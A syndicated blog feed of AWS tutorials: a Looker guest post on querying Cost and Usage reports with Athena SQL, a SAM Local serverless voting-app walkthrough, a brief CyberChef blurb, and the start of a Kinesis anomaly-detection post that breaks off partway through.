This is a guest post by Dillon Morrison at Looker. Looker is, in their own words, “a new kind of analytics platform–letting everyone in your business make better decisions by getting reliable answers from a tool they can use.” 

As the breadth of AWS products and services continues to grow, customers are able to more easily move their technology stack and core infrastructure to AWS. One of the attractive benefits of AWS is the cost savings. Rather than paying upfront capital expenses for large on-premises systems, customers can instead pay variable expenses for on-demand services. To further reduce expenses, AWS users can reserve resources for specific periods of time, and automatically scale resources as needed.

The AWS Cost Explorer is great for aggregated reporting. However, conducting analysis on the raw data using the flexibility and power of SQL allows for much richer detail and insight, and can be the better choice for the long term. Thankfully, with the introduction of Amazon Athena, monitoring and managing these costs is now easier than ever.

In this post, I walk through setting up the data pipeline for cost and usage reports, Amazon S3, and Athena, and discuss some of the most common levers for cost savings. I surface tables through Looker, which comes with a host of pre-built data models and dashboards to make analysis of your cost and usage data simple and intuitive.

Analysis with Athena

With Athena, there’s no need to create hundreds of Excel reports, move data around, or deploy clusters to house and process data. Athena uses Apache Hive’s DDL to create tables, and the Presto querying engine to process queries. Analysis can be performed directly on raw data in S3. Conveniently, AWS exports raw cost and usage data directly into a user-specified S3 bucket, making it simple to start querying with Athena quickly. This makes continuous monitoring of costs virtually seamless, since there is no infrastructure to manage. Instead, users can leverage the power of the Athena SQL engine to easily perform ad-hoc analysis and data discovery without needing to set up a data warehouse.

After the data pipeline is established, cost and usage data (the recommended billing data, per AWS documentation) provides a plethora of comprehensive information around usage of AWS services and the associated costs. Whether you need the report segmented by product type, user identity, or region, this report can be cut-and-sliced any number of ways to properly allocate costs for any of your business needs. You can then drill into any specific line item to see even further detail, such as the selected operating system, tenancy, purchase option (on-demand, spot, or reserved), and so on.

Walkthrough

By default, the Cost and Usage report exports CSV files, which you can compress using gzip (recommended for performance). There are some additional configuration options for tuning performance further, which are discussed below.

Prerequisites

If you want to follow along, you need the following resources:

Enable the cost and usage reports

First, enable the Cost and Usage report. For Time unit, select Hourly. For Include, select Resource IDs. All options are prompted in the report-creation window.

The Cost and Usage report dumps CSV files into the specified S3 bucket. Please note that it can take up to 24 hours for the first file to be delivered after enabling the report.

Configure the S3 bucket and files for Athena querying

In addition to the CSV file, AWS also creates a JSON manifest file for each cost and usage report. Athena requires that all of the files in the S3 bucket are in the same format, so we need to get rid of all these manifest files. If you’re looking to get started with Athena quickly, you can simply go into your S3 bucket and delete the manifest file manually, skip the automation described below, and move on to the next section.

To automate the process of removing the manifest file each time a new report is dumped into S3, which I recommend as you scale, there are a few additional steps. The folks at Concurrency labs wrote a great overview and set of scripts for this, which you can find in their GitHub repo.

These scripts take the data from an input bucket, remove anything unnecessary, and dump it into a new output bucket. We can utilize AWS Lambda to trigger this process whenever new data is dropped into S3, or on a nightly basis, or whatever makes most sense for your use-case, depending on how often you’re querying the data. Please note that enabling the “hourly” report means that data is reported at the hour-level of granularity, not that a new file is generated every hour.

Following these scripts, you’ll notice that we’re adding a date partition field, which isn’t necessary but improves query performance. In addition, converting data from CSV to a columnar format like ORC or Parquet also improves performance. We can automate this process using Lambda whenever new data is dropped in our S3 bucket. Amazon Web Services discusses columnar conversion at length, and provides walkthrough examples, in their documentation.

As a long-term solution, best practice is to use compression, partitioning, and conversion. However, for purposes of this walkthrough, we’re not going to worry about them so we can get up-and-running quicker.

Set up the Athena query engine

In your AWS console, navigate to the Athena service, and click “Get Started”. Follow the tutorial and set up a new database (we’ve called ours “AWS Optimizer” in this example). Don’t worry about configuring your initial table, per the tutorial instructions. We’ll be creating a new table for cost and usage analysis. Once you’ve walked through the tutorial steps, you’ll be able to access the Athena interface, and can begin running Hive DDL statements to create new tables.

One thing that’s important to note is that the Cost and Usage CSVs also contain the column headers in their first row, meaning that the column headers would be included in the dataset and any queries. For testing and quick set-up, you can remove this line manually from your first few CSV files. Long-term, you’ll want to use a script to programmatically remove this row each time a new file is dropped in S3 (every few hours typically). We’ve drafted up a sample script for ease of reference, which we run on Lambda. We utilize Lambda’s native ability to invoke the script whenever a new object is dropped in S3.
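
The sample script itself is linked rather than reproduced in this post, but a minimal sketch of the idea, assuming gzip-compressed CSV reports and a separate clean/ prefix for the output, might look like the following:

import gzip
import boto3

s3 = boto3.client('s3')

def lambda_handler(event, context):
    #Triggered whenever a new report file lands in the bucket
    bucket = event['Records'][0]['s3']['bucket']['name']
    key = event['Records'][0]['s3']['object']['key']

    s3.download_file(bucket, key, '/tmp/report.csv.gz')

    #Drop the first line (the column headers) and rewrite the file
    with gzip.open('/tmp/report.csv.gz', 'rb') as src, gzip.open('/tmp/clean.csv.gz', 'wb') as dst:
        next(src)  #skip the header row
        for line in src:
            dst.write(line)

    #Write to a separate prefix so the upload doesn't re-trigger this function
    s3.upload_file('/tmp/clean.csv.gz', bucket, 'clean/' + key.split('/')[-1])
    return 'success'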

For cost and usage, we recommend using the DDL statement below. Since our data is in CSV format, we don’t need to use a SerDe, we can simply specify the “separatorChar, quoteChar, and escapeChar”, and the structure of the files (“TEXTFILE”). Note that AWS does have an OpenCSV SerDe as well, if you prefer to use that.

 

CREATE EXTERNAL TABLE IF NOT EXISTS cost_and_usage (
identity_LineItemId String,
identity_TimeInterval String,
bill_InvoiceId String,
bill_BillingEntity String,
bill_BillType String,
bill_PayerAccountId String,
bill_BillingPeriodStartDate String,
bill_BillingPeriodEndDate String,
lineItem_UsageAccountId String,
lineItem_LineItemType String,
lineItem_UsageStartDate String,
lineItem_UsageEndDate String,
lineItem_ProductCode String,
lineItem_UsageType String,
lineItem_Operation String,
lineItem_AvailabilityZone String,
lineItem_ResourceId String,
lineItem_UsageAmount String,
lineItem_NormalizationFactor String,
lineItem_NormalizedUsageAmount String,
lineItem_CurrencyCode String,
lineItem_UnblendedRate String,
lineItem_UnblendedCost String,
lineItem_BlendedRate String,
lineItem_BlendedCost String,
lineItem_LineItemDescription String,
lineItem_TaxType String,
product_ProductName String,
product_accountAssistance String,
product_architecturalReview String,
product_architectureSupport String,
product_availability String,
product_bestPractices String,
product_cacheEngine String,
product_caseSeverityresponseTimes String,
product_clockSpeed String,
product_currentGeneration String,
product_customerServiceAndCommunities String,
product_databaseEdition String,
product_databaseEngine String,
product_dedicatedEbsThroughput String,
product_deploymentOption String,
product_description String,
product_durability String,
product_ebsOptimized String,
product_ecu String,
product_endpointType String,
product_engineCode String,
product_enhancedNetworkingSupported String,
product_executionFrequency String,
product_executionLocation String,
product_feeCode String,
product_feeDescription String,
product_freeQueryTypes String,
product_freeTrial String,
product_frequencyMode String,
product_fromLocation String,
product_fromLocationType String,
product_group String,
product_groupDescription String,
product_includedServices String,
product_instanceFamily String,
product_instanceType String,
product_io String,
product_launchSupport String,
product_licenseModel String,
product_location String,
product_locationType String,
product_maxIopsBurstPerformance String,
product_maxIopsvolume String,
product_maxThroughputvolume String,
product_maxVolumeSize String,
product_maximumStorageVolume String,
product_memory String,
product_messageDeliveryFrequency String,
product_messageDeliveryOrder String,
product_minVolumeSize String,
product_minimumStorageVolume String,
product_networkPerformance String,
product_operatingSystem String,
product_operation String,
product_operationsSupport String,
product_physicalProcessor String,
product_preInstalledSw String,
product_proactiveGuidance String,
product_processorArchitecture String,
product_processorFeatures String,
product_productFamily String,
product_programmaticCaseManagement String,
product_provisioned String,
product_queueType String,
product_requestDescription String,
product_requestType String,
product_routingTarget String,
product_routingType String,
product_servicecode String,
product_sku String,
product_softwareType String,
product_storage String,
product_storageClass String,
product_storageMedia String,
product_technicalSupport String,
product_tenancy String,
product_thirdpartySoftwareSupport String,
product_toLocation String,
product_toLocationType String,
product_training String,
product_transferType String,
product_usageFamily String,
product_usagetype String,
product_vcpu String,
product_version String,
product_volumeType String,
product_whoCanOpenCases String,
pricing_LeaseContractLength String,
pricing_OfferingClass String,
pricing_PurchaseOption String,
pricing_publicOnDemandCost String,
pricing_publicOnDemandRate String,
pricing_term String,
pricing_unit String,
reservation_AvailabilityZone String,
reservation_NormalizedUnitsPerReservation String,
reservation_NumberOfReservations String,
reservation_ReservationARN String,
reservation_TotalReservedNormalizedUnits String,
reservation_TotalReservedUnits String,
reservation_UnitsPerReservation String,
resourceTags_userName String,
resourceTags_usercostcategory String
)
    ROW FORMAT DELIMITED
      FIELDS TERMINATED BY ','
      ESCAPED BY '\\'
      LINES TERMINATED BY '\n'

STORED AS TEXTFILE
    LOCATION 's3://<<your bucket name>>';

Once you’ve successfully executed the command, you should see a new table named “cost_and_usage” with the below properties. Now we’re ready to start executing queries and running analysis!

Start with Looker and connect to Athena

Setting up Looker is a quick process, and you can try it out for free here (or download from Amazon Marketplace). It takes just a few seconds to connect Looker to your Athena database, and Looker comes with a host of pre-built data models and dashboards to make analysis of your cost and usage data simple and intuitive. After you’re connected, you can use the Looker UI to run whatever analysis you’d like. Looker translates this UI to optimized SQL, so any user can execute and visualize queries for true self-service analytics.

Major cost saving levers

Now that the data pipeline is configured, you can dive into the most popular use cases for cost savings. In this post, I focus on:

  • Purchasing Reserved Instances vs. On-Demand Instances
  • Data transfer costs
  • Allocating costs over users or other Attributes (denoted with resource tags)

On-Demand, Spot, and Reserved Instances

Purchasing Reserved Instances vs On-Demand Instances is arguably going to be the biggest cost lever for heavy AWS users (Reserved Instances run up to 75% cheaper!). AWS offers three options for purchasing instances:

  • On-Demand—Pay as you use.
  • Spot (variable cost)—Bid on spare Amazon EC2 computing capacity.
  • Reserved Instances—Pay for an instance for a specific, allotted period of time.

When purchasing a Reserved Instance, you can also choose to pay all-upfront, partial-upfront, or monthly. The more you pay upfront, the greater the discount.

If your company has been using AWS for some time now, you should have a good sense of your overall instance usage on a per-month or per-day basis. Rather than paying for these instances On-Demand, you should try to forecast the number of instances you’ll need, and reserve them with upfront payments.

The total amount of usage covered by Reserved Instances versus overall usage across all instances is called your coverage ratio. It’s important not to confuse your coverage ratio with your Reserved Instance utilization. Utilization represents the amount of reserved hours that were actually used. Don’t worry about exceeding capacity; you can still set up Auto Scaling preferences so that more instances get added whenever your coverage or utilization crosses a certain threshold (we often see a target of 80% for both coverage and utilization among savvy customers).
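
As a concrete illustration of the difference between the two ratios, with purely hypothetical numbers:

#Hypothetical numbers for one month of usage
reserved_hours_used = 1450.0       #reserved hours actually consumed
reserved_hours_purchased = 1600.0  #reserved hours you paid for
total_instance_hours = 2000.0      #all instance hours, reserved or not

coverage = reserved_hours_used / total_instance_hours         #0.725 -> 72.5% coverage
utilization = reserved_hours_used / reserved_hours_purchased  #0.90625 -> ~91% utilization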

Calculating the reserved costs and coverage can be a bit tricky with the level of granularity provided by the cost and usage report. The following query shows your total cost over the last 6 months, broken out by Reserved Instance vs other instance usage. You can substitute the cost field for usage if you’d prefer. Please note that you should only have data for the time period after the cost and usage report has been enabled (though you can opt for up to 3 months of historical data by contacting your AWS Account Executive). If you’re just getting started, this query will only show a few days.

 

SELECT 
	DATE_FORMAT(from_iso8601_timestamp(cost_and_usage.lineitem_usagestartdate),'%Y-%m') AS "cost_and_usage.usage_start_month",
	COALESCE(SUM(cost_and_usage.lineitem_unblendedcost ), 0) AS "cost_and_usage.total_unblended_cost",
	COALESCE(SUM(CASE WHEN (CASE
         WHEN cost_and_usage.lineitem_lineitemtype = 'DiscountedUsage' THEN 'RI Line Item'
         WHEN cost_and_usage.lineitem_lineitemtype = 'RIFee' THEN 'RI Line Item'
         WHEN cost_and_usage.lineitem_lineitemtype = 'Fee' THEN 'RI Line Item'
         ELSE 'Non RI Line Item'
        END = 'RI Line Item') THEN cost_and_usage.lineitem_unblendedcost  ELSE NULL END), 0) AS "cost_and_usage.total_reserved_unblended_cost",
	1.0 * (COALESCE(SUM(CASE WHEN (CASE
         WHEN cost_and_usage.lineitem_lineitemtype = 'DiscountedUsage' THEN 'RI Line Item'
         WHEN cost_and_usage.lineitem_lineitemtype = 'RIFee' THEN 'RI Line Item'
         WHEN cost_and_usage.lineitem_lineitemtype = 'Fee' THEN 'RI Line Item'
         ELSE 'Non RI Line Item'
        END = 'RI Line Item') THEN cost_and_usage.lineitem_unblendedcost  ELSE NULL END), 0)) / NULLIF((COALESCE(SUM(cost_and_usage.lineitem_unblendedcost ), 0)),0)  AS "cost_and_usage.percent_spend_on_ris",
	COALESCE(SUM(CASE WHEN (CASE
         WHEN cost_and_usage.lineitem_lineitemtype = 'DiscountedUsage' THEN 'RI Line Item'
         WHEN cost_and_usage.lineitem_lineitemtype = 'RIFee' THEN 'RI Line Item'
         WHEN cost_and_usage.lineitem_lineitemtype = 'Fee' THEN 'RI Line Item'
         ELSE 'Non RI Line Item'
        END = 'Non RI Line Item') THEN cost_and_usage.lineitem_unblendedcost  ELSE NULL END), 0) AS "cost_and_usage.total_non_reserved_unblended_cost",
	1.0 * (COALESCE(SUM(CASE WHEN (CASE
         WHEN cost_and_usage.lineitem_lineitemtype = 'DiscountedUsage' THEN 'RI Line Item'
         WHEN cost_and_usage.lineitem_lineitemtype = 'RIFee' THEN 'RI Line Item'
         WHEN cost_and_usage.lineitem_lineitemtype = 'Fee' THEN 'RI Line Item'
         ELSE 'Non RI Line Item'
        END = 'Non RI Line Item') THEN cost_and_usage.lineitem_unblendedcost  ELSE NULL END), 0)) / NULLIF((COALESCE(SUM(cost_and_usage.lineitem_unblendedcost ), 0)),0)  AS "cost_and_usage.percent_spend_on_non_ris"
FROM aws_optimizer.cost_and_usage  AS cost_and_usage

WHERE 
	(((from_iso8601_timestamp(cost_and_usage.lineitem_usagestartdate)) >= ((DATE_ADD('month', -5, DATE_TRUNC('MONTH', CAST(NOW() AS DATE))))) AND (from_iso8601_timestamp(cost_and_usage.lineitem_usagestartdate)) < ((DATE_ADD('month', 6, DATE_ADD('month', -5, DATE_TRUNC('MONTH', CAST(NOW() AS DATE))))))))
GROUP BY 1
ORDER BY 2 DESC
LIMIT 500

The resulting table should look something like the image below (I’m surfacing tables through Looker, though the same table would result from querying via command line or any other interface).

With a BI tool, you can create dashboards for easy reference and monitoring. New data is dumped into S3 every few hours, so your dashboards can update several times per day.

It’s an iterative process to understand the appropriate number of Reserved Instances needed to meet your business needs. After you’ve properly integrated Reserved Instances into your purchasing patterns, the savings can be significant. If your coverage is consistently below 70%, you should seriously consider adjusting your purchase types and opting for more Reserved instances.

Data transfer costs

One of the great things about AWS data storage is that it’s incredibly cheap. Most charges often come from moving and processing that data. There are several different prices for transferring data, broken out largely by transfers between regions and availability zones. Transfers between regions are the most costly, followed by transfers between Availability Zones. Transfers within the same region and same availability zone are free unless using elastic or public IP addresses, in which case there is a cost. You can find more detailed information in the AWS Pricing Docs. With this in mind, there are several simple strategies for helping reduce costs.

First, since costs increase when transferring data between regions, it’s wise to ensure that as many services as possible reside within the same region. The more you can localize services to one specific region, the lower your costs will be.

Second, you should maximize the data you’re routing directly within AWS services and IP addresses. Transfers out to the open internet are the most costly and least performant mechanisms of data transfers, so it’s best to keep transfers within AWS services.

Lastly, data transfers between private IP addresses are cheaper than between elastic or public IP addresses, so utilizing private IP addresses as much as possible is the most cost-effective strategy.

The following query provides a table depicting the total costs for each AWS product, broken out by transfer cost type. Substitute the “lineitem_productcode” field in the query to segment the costs by any other attribute. If you notice any unusually high spikes in cost, you’ll need to dig deeper to understand what’s driving that spike: location, volume, and so on. Drill down into specific costs by including “product_usagetype” and “product_transfertype” in your query to identify the types of transfer costs that are driving up your bill.

SELECT 
	cost_and_usage.lineitem_productcode  AS "cost_and_usage.product_code",
	COALESCE(SUM(cost_and_usage.lineitem_unblendedcost), 0) AS "cost_and_usage.total_unblended_cost",
	COALESCE(SUM(CASE WHEN REGEXP_LIKE(cost_and_usage.product_usagetype, 'DataTransfer')    THEN cost_and_usage.lineitem_unblendedcost  ELSE NULL END), 0) AS "cost_and_usage.total_data_transfer_cost",
	COALESCE(SUM(CASE WHEN REGEXP_LIKE(cost_and_usage.product_usagetype, 'DataTransfer-In')    THEN cost_and_usage.lineitem_unblendedcost  ELSE NULL END), 0) AS "cost_and_usage.total_inbound_data_transfer_cost",
	COALESCE(SUM(CASE WHEN REGEXP_LIKE(cost_and_usage.product_usagetype, 'DataTransfer-Out')    THEN cost_and_usage.lineitem_unblendedcost  ELSE NULL END), 0) AS "cost_and_usage.total_outbound_data_transfer_cost"
FROM aws_optimizer.cost_and_usage  AS cost_and_usage

WHERE 
	(((from_iso8601_timestamp(cost_and_usage.lineitem_usagestartdate)) >= ((DATE_ADD('month', -5, DATE_TRUNC('MONTH', CAST(NOW() AS DATE))))) AND (from_iso8601_timestamp(cost_and_usage.lineitem_usagestartdate)) < ((DATE_ADD('month', 6, DATE_ADD('month', -5, DATE_TRUNC('MONTH', CAST(NOW() AS DATE))))))))
GROUP BY 1
ORDER BY 2 DESC
LIMIT 500

When moving between regions or over the open web, many data transfer costs also include the origin and destination location of the data movement. Using a BI tool with mapping capabilities, you can get a nice visual of data flows. The point at the center of the map is used to represent external data flows over the open internet.

Analysis by tags

AWS provides the option to apply custom tags to individual resources, so you can allocate costs over whatever customized segment makes the most sense for your business. For a SaaS company that hosts software for customers on AWS, maybe you’d want to tag the size of each customer. The following query uses custom tags to display the reserved, data transfer, and total cost for each AWS service, broken out by tag categories, over the last 6 months. You’ll want to substitute the cost_and_usage.resourcetags_customersegment and cost_and_usage.customer_segment with the name of your customer field.

 

SELECT * FROM (
SELECT *, DENSE_RANK() OVER (ORDER BY z___min_rank) as z___pivot_row_rank, RANK() OVER (PARTITION BY z__pivot_col_rank ORDER BY z___min_rank) as z__pivot_col_ordering FROM (
SELECT *, MIN(z___rank) OVER (PARTITION BY "cost_and_usage.product_code") as z___min_rank FROM (
SELECT *, RANK() OVER (ORDER BY CASE WHEN z__pivot_col_rank=1 THEN (CASE WHEN "cost_and_usage.total_unblended_cost" IS NOT NULL THEN 0 ELSE 1 END) ELSE 2 END, CASE WHEN z__pivot_col_rank=1 THEN "cost_and_usage.total_unblended_cost" ELSE NULL END DESC, "cost_and_usage.total_unblended_cost" DESC, z__pivot_col_rank, "cost_and_usage.product_code") AS z___rank FROM (
SELECT *, DENSE_RANK() OVER (ORDER BY CASE WHEN "cost_and_usage.customer_segment" IS NULL THEN 1 ELSE 0 END, "cost_and_usage.customer_segment") AS z__pivot_col_rank FROM (
SELECT 
	cost_and_usage.lineitem_productcode  AS "cost_and_usage.product_code",
	cost_and_usage.resourcetags_customersegment  AS "cost_and_usage.customer_segment",
	COALESCE(SUM(cost_and_usage.lineitem_unblendedcost ), 0) AS "cost_and_usage.total_unblended_cost",
	1.0 * (COALESCE(SUM(CASE WHEN REGEXP_LIKE(cost_and_usage.product_usagetype, 'DataTransfer')    THEN cost_and_usage.lineitem_unblendedcost  ELSE NULL END), 0)) / NULLIF((COALESCE(SUM(cost_and_usage.lineitem_unblendedcost ), 0)),0)  AS "cost_and_usage.percent_spend_data_transfers_unblended",
	1.0 * (COALESCE(SUM(CASE WHEN (CASE
         WHEN cost_and_usage.lineitem_lineitemtype = 'DiscountedUsage' THEN 'RI Line Item'
         WHEN cost_and_usage.lineitem_lineitemtype = 'RIFee' THEN 'RI Line Item'
         WHEN cost_and_usage.lineitem_lineitemtype = 'Fee' THEN 'RI Line Item'
         ELSE 'Non RI Line Item'
        END = 'Non RI Line Item') THEN cost_and_usage.lineitem_unblendedcost  ELSE NULL END), 0)) / NULLIF((COALESCE(SUM(cost_and_usage.lineitem_unblendedcost ), 0)),0)  AS "cost_and_usage.unblended_percent_spend_on_ris"
FROM aws_optimizer.cost_and_usage_raw  AS cost_and_usage

WHERE 
	(((from_iso8601_timestamp(cost_and_usage.lineitem_usagestartdate)) >= ((DATE_ADD('month', -5, DATE_TRUNC('MONTH', CAST(NOW() AS DATE))))) AND (from_iso8601_timestamp(cost_and_usage.lineitem_usagestartdate)) < ((DATE_ADD('month', 6, DATE_ADD('month', -5, DATE_TRUNC('MONTH', CAST(NOW() AS DATE))))))))
GROUP BY 1,2) ww
) bb WHERE z__pivot_col_rank <= 16384
) aa
) xx
) zz
 WHERE z___pivot_row_rank <= 500 OR z__pivot_col_ordering = 1 ORDER BY z___pivot_row_rank

The resulting table in this example looks like the results below. In this example, you can tell that we’re making poor use of Reserved Instances because they represent such a small portion of our overall costs.

Again, using a BI tool to visualize these costs and trends over time makes the analysis much easier to consume and take action on.

Summary

Saving costs on your AWS spend is always an iterative, ongoing process. Hopefully with these queries alone, you can start to understand your spending patterns and identify opportunities for savings. However, this is just a peek into the many opportunities available through analysis of the Cost and Usage report. Each company is different, with unique needs and usage patterns. To achieve maximum cost savings, we encourage you to set up an analytics environment that enables your team to explore all potential cuts and slices of your usage data, whenever it’s necessary. Exploring different trends and spikes across regions, services, user types, etc. helps you gain a comprehensive understanding of your major cost levers and consistently implement new cost reduction strategies.

Note that all of the queries and analysis provided in this post were generated using the Looker data platform. If you’re already a Looker customer, you can get all of this analysis, additional pre-configured dashboards, and much more using Looker Blocks for AWS.


About the Author

Dillon Morrison leads the Platform Ecosystem at Looker. He enjoys exploring new technologies and architecting the most efficient data solutions for the business needs of his company and their customers. In his spare time, you’ll find Dillon rock climbing in the Bay Area or nose deep in the docs of the latest AWS product release at his favorite cafe (“Arlequin in SF is unbeatable!”).


New – AWS SAM Local (Beta) – Build and Test Serverless Applications Locally

Post Syndicated from Randall Hunt original https://aws.amazon.com/blogs/aws/new-aws-sam-local-beta-build-and-test-serverless-applications-locally/

Today we’re releasing a beta of a new tool, SAM Local, that makes it easy to build and test your serverless applications locally. In this post we’ll use SAM Local to build, debug, and deploy a quick application that allows us to vote on tabs or spaces by curling an endpoint. AWS introduced the Serverless Application Model (SAM) last year to make it easier for developers to deploy serverless applications. If you’re not already familiar with SAM, my colleague Orr wrote a great post on how to use SAM that you can read in about 5 minutes. At its core, SAM is a powerful open source specification built on AWS CloudFormation that makes it easy to keep your serverless infrastructure as code – and they have the cutest mascot.

SAM Local takes all the good parts of SAM and brings them to your local machine.

There are a couple of ways to install SAM Local but the easiest is through NPM. A quick npm install -g aws-sam-local should get us going but if you want the latest version you can always install straight from the source: go get github.com/awslabs/aws-sam-local (this will create a binary named aws-sam-local, not sam).

I like to vote on things so let’s write a quick SAM application to vote on Spaces versus Tabs. We’ll use a very simple, but powerful, architecture of API Gateway fronting a Lambda function and we’ll store our results in DynamoDB. In the end a user should be able to curl our API curl https://SOMEURL/ -d '{"vote": "spaces"}' and get back the number of votes.

Let’s start by writing a simple SAM template.yaml:

AWSTemplateFormatVersion : '2010-09-09'
Transform: AWS::Serverless-2016-10-31
Resources:
  VotesTable:
    Type: "AWS::Serverless::SimpleTable"
  VoteSpacesTabs:
    Type: "AWS::Serverless::Function"
    Properties:
      Runtime: python3.6
      Handler: lambda_function.lambda_handler
      Policies: AmazonDynamoDBFullAccess
      Environment:
        Variables:
          TABLE_NAME: !Ref VotesTable
      Events:
        Vote:
          Type: Api
          Properties:
            Path: /
            Method: post

So we create a DynamoDB table (the AWS::Serverless::SimpleTable resource above) that we expose to our Lambda function through an environment variable called TABLE_NAME.

To test that this template is valid I’ll go ahead and call sam validate to make sure I haven’t fat-fingered anything. It returns Valid! so let’s go ahead and get to work on our Lambda function.

import os
import json
import boto3
votes_table = boto3.resource('dynamodb').Table(os.getenv('TABLE_NAME'))

def lambda_handler(event, context):
    print(event)
    if event['httpMethod'] == 'GET':
        resp = votes_table.scan()
        return {'body': json.dumps({item['id']: int(item['votes']) for item in resp['Items']})}
    elif event['httpMethod'] == 'POST':
        try:
            body = json.loads(event['body'])
        except:
            return {'statusCode': 400, 'body': 'malformed json input'}
        if 'vote' not in body:
            return {'statusCode': 400, 'body': 'missing vote in request body'}
        if body['vote'] not in ['spaces', 'tabs']:
            return {'statusCode': 400, 'body': 'vote value must be "spaces" or "tabs"'}

        resp = votes_table.update_item(
            Key={'id': body['vote']},
            UpdateExpression='ADD votes :incr',
            ExpressionAttributeValues={':incr': 1},
            ReturnValues='ALL_NEW'
        )
        return {'body': "{} now has {} votes".format(body['vote'], resp['Attributes']['votes'])}

So let’s test this locally. I’ll need to create a real DynamoDB database to talk to and I’ll need to provide the name of that database through the environment variable TABLE_NAME. I could do that with an env.json file or I can just pass it on the command line. First, I can call:
$ echo '{"httpMethod": "POST", "body": "{\"vote\": \"spaces\"}"}' |\
TABLE_NAME="vote-spaces-tabs" sam local invoke "VoteSpacesTabs"

to test the Lambda – it returns the number of votes for spaces, so theoretically everything is working. Typing all of that out is a pain, so I could generate a sample event with sam local generate-event api and pass that in to the local invocation. Far easier than all of that is just running our API locally. Let’s do that: sam local start-api. Now I can curl my local endpoints to test everything out.
I’ll run the command: $ curl -d '{"vote": "tabs"}' http://127.0.0.1:3000/ and it returns: “tabs now has 12 votes”. Now, of course I did not write this function perfectly on my first try. I edited and saved several times. One of the benefits of hot-reloading is that as I change the function I don’t have to do any additional work to test the new function. This makes iterative development vastly easier.

Let’s say we don’t want to deal with accessing a real DynamoDB database over the network though. What are our options? Well we can download DynamoDB Local and launch it with java -Djava.library.path=./DynamoDBLocal_lib -jar DynamoDBLocal.jar -sharedDb. Then we can have our Lambda function use the AWS_SAM_LOCAL environment variable to make some decisions about how to behave. Let’s modify our function a bit:

import os
import json
import boto3
if os.getenv("AWS_SAM_LOCAL"):
    votes_table = boto3.resource(
        'dynamodb',
        endpoint_url="http://docker.for.mac.localhost:8000/"
    ).Table("spaces-tabs-votes")
else:
    votes_table = boto3.resource('dynamodb').Table(os.getenv('TABLE_NAME'))

Now we’re using a local endpoint to connect to our local database which makes working without wifi a little easier.

SAM local even supports interactive debugging! In Java and Node.js I can just pass the -d flag and a port to immediately enable the debugger. For Python I could use a library like import epdb; epdb.serve() and connect that way. Then we can call sam local invoke -d 8080 "VoteSpacesTabs" and our function will pause execution waiting for you to step through with the debugger.

Alright, I think we’ve got everything working so let’s deploy this!

First I’ll call the sam package command which is just an alias for aws cloudformation package and then I’ll use the result of that command to sam deploy.

$ sam package --template-file template.yaml --s3-bucket MYAWESOMEBUCKET --output-template-file package.yaml
Uploading to 144e47a4a08f8338faae894afe7563c3  90570 / 90570.0  (100.00%)
Successfully packaged artifacts and wrote output template to file package.yaml.
Execute the following command to deploy the packaged template
aws cloudformation deploy --template-file package.yaml --stack-name 
$ sam deploy --template-file package.yaml --stack-name VoteForSpaces --capabilities CAPABILITY_IAM
Waiting for changeset to be created..
Waiting for stack create/update to complete
Successfully created/updated stack - VoteForSpaces

Which brings us to our API:

I’m going to hop over into the production stage and add some rate limiting in case you guys start voting a lot – but otherwise we’ve taken our local work and deployed it to the cloud without much effort at all. I always enjoy it when things work on the first deploy!

You can vote now and watch the results live! http://spaces-or-tabs.s3-website-us-east-1.amazonaws.com/

We hope that SAM Local makes it easier for you to test, debug, and deploy your serverless apps. We have a CONTRIBUTING.md guide and we welcome pull requests. Please tweet at us to let us know what cool things you build. You can see our What’s New post here and the documentation is live here.

Randall

CyberChef – Cyber Swiss Army Knife

Post Syndicated from Darknet original http://feedproxy.google.com/~r/darknethackers/~3/SOhld_nebGs/

CyberChef is a simple, intuitive web app for carrying out all manner of “cyber” operations within a web browser. These operations include simple encoding like XOR or Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509…

Read the full post at darknet.org.uk

Perform Near Real-time Analytics on Streaming Data with Amazon Kinesis and Amazon Elasticsearch Service

Post Syndicated from Tristan Li original https://aws.amazon.com/blogs/big-data/perform-near-real-time-analytics-on-streaming-data-with-amazon-kinesis-and-amazon-elasticsearch-service/

Nowadays, streaming data is seen and used everywhere—from social networks, to mobile and web applications, IoT devices, instrumentation in data centers, and many other sources. As the speed and volume of this type of data increases, the need to perform data analysis in real time with machine learning algorithms and extract a deeper understanding from the data becomes ever more important. For example, you might want a continuous monitoring system to detect sentiment changes in a social media feed so that you can react to the sentiment in near real time.

In this post, we use Amazon Kinesis Streams to collect and store streaming data. We then use Amazon Kinesis Analytics to process and analyze the streaming data continuously. Specifically, we use the Kinesis Analytics built-in RANDOM_CUT_FOREST function, a machine learning algorithm, to detect anomalies in the streaming data. Finally, we use Amazon Kinesis Firehose to export the anomalies data to Amazon Elasticsearch Service (Amazon ES). We then build a simple dashboard in the open source tool Kibana to visualize the result.

Solution overview

The following diagram depicts a high-level overview of this solution.

Amazon Kinesis Streams

You can use Amazon Kinesis Streams to build your own streaming application. This application can process and analyze streaming data by continuously capturing and storing terabytes of data per hour from hundreds of thousands of sources.

Amazon Kinesis Analytics

Kinesis Analytics provides an easy and familiar standard SQL language to analyze streaming data in real time. One of its most powerful features is that there are no new languages, processing frameworks, or complex machine learning algorithms that you need to learn.

Amazon Kinesis Firehose

Kinesis Firehose is the easiest way to load streaming data into AWS. It can capture, transform, and load streaming data into Amazon S3, Amazon Redshift, and Amazon Elasticsearch Service.

Amazon Elasticsearch Service

Amazon ES is a fully managed service that makes it easy to deploy, operate, and scale Elasticsearch for log analytics, full text search, application monitoring, and more.

Solution summary

The following is a quick walkthrough of the solution that’s presented in the diagram:

  1. IoT sensors send streaming data into Kinesis Streams. In this post, you use a Python script to simulate an IoT temperature sensor device that sends the streaming data.
  2. By using the built-in RANDOM_CUT_FOREST function in Kinesis Analytics, you can detect anomalies in real time with the sensor data that is stored in Kinesis Streams. RANDOM_CUT_FOREST is also an appropriate algorithm for many other kinds of anomaly-detection use cases—for example, the media sentiment example mentioned earlier in this post.
  3. The processed anomaly data is then loaded into the Kinesis Firehose delivery stream.
  4. By using the built-in integration that Kinesis Firehose has with Amazon ES, you can easily export the processed anomaly data into the service and visualize it with Kibana.

Implementation steps

The following sections walk through the implementation steps in detail.

Creating the delivery stream

  1. Open the Amazon Kinesis Streams console.
  2. Create a new Kinesis stream. Give it a name that indicates it’s for raw incoming stream data—for example, RawStreamData. For Number of shards, type 1.
